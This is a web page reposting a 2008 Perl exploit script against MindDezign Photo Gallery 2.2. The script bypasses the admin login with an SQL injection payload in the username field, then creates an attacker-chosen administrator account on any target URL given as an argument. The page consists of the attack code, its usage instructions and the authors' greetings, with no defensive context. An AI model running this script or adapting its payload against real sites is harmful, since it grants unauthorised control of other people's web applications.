Home / os / win10

minddezignpg-admin.txt

Posted on 23 October 2008

#!/usr/bin/perl #============================================================= # MindDezign Photo 2.2 Gallery Arbitrary Add Admin Exploit #============================================================= # ,--^----------,--------,-----,-------^--, # | ||||||||| `--------' | O .. CWH Underground .. # `+---------------------------^----------| # `\_,-------, _________________________| # / XXXXXX /`| / # / XXXXXX / ` / # / XXXXXX /\______( # / XXXXXX / # / XXXXXX / # (________( # `------' # #AUTHOR : CWH Underground #DATE : 23 October 2008 #SITE : cwh.citec.us # # ##################################################### #APPLICATION : MindDezign Photo Gallery #VERSION : 2.2 #DOWNLOAD : http://gallery.minddezign.com/?module=download ##################################################### # #Note: magic_quotes_gpc = off # #This Exploit will Add user to Administrator's Privilege. # ####################################################################################### #Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK #Special Thx : asylu3, str0ke, citec.us, milw0rm.com ####################################################################################### use LWP; use HTTP::Request; use HTTP::Cookies; print " ================================================== "; print " MindDezign Photo Arbitrary Add Admin Exploit "; print " "; print " Discovered By CWH Underground "; print "================================================== "; print " "; print " ,--^----------,--------,-----,-------^--, "; print " | ||||||||| `--------' | O "; print " `+---------------------------^----------| "; print " `\_,-------, _________________________| "; print " / XXXXXX /`| / "; print " / XXXXXX / ` / "; print " / XXXXXX /\______( "; print " / XXXXXX / "; print " / XXXXXX / .. CWH Underground .. "; print " (________( "; print " `------' "; print " "; if ($#ARGV + 1 != 3) { print "Usage: ./xpl.pl <Target URL> <user> <pass> "; print "Ex. ./xpl.pl http://www.target.com/gallery/ cwhuser cwhpass "; exit(); } $blogurl = $ARGV[0]; $user = $ARGV[1]; $pass = $ARGV[2]; $loginurl = $blogurl."?module=admin&action=login&task=login"; $adduserurl = $blogurl."?module=admin&action=account&task=edit"; $post_content = "username=".$user."&password=".$pass."&confirm_pass=".$pass."&btn_submit=Submit"; print " ..::Login Page URL::.. "; print "$loginurl "; print " ..::Add User Page URL::.. "; print "$adduserurl "; print "..::Login Process::.. "; $ua = LWP::UserAgent->new; $ua->cookie_jar(HTTP::Cookies->new); $request = HTTP::Request->new (POST => $loginurl); $request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'); $request->content_type ('application/x-www-form-urlencoded'); $request->content ('username=admin'+or+'a'='&password=a&btn_submit=Submit'); $response = $ua->request($request); $location = $response -> header('Location'); print " [+]Result :: "; if ($location =~ /gallery_item_list/) { print "Login Success!!! "; } else { print "Login Failed!!! "; exit(); } print " ..::Add Admin Exploit::.. "; $request = HTTP::Request->new (POST => $adduserurl); $request->content_type ('application/x-www-form-urlencoded'); $request->content ($post_content); $response = $ua->request($request); print " [+]Result "; print "Username :: ".$user." "; print "Password :: ".$pass." "; print "Role :: Administrator "; print " Enjoy with Bugs ;)"

 

TOP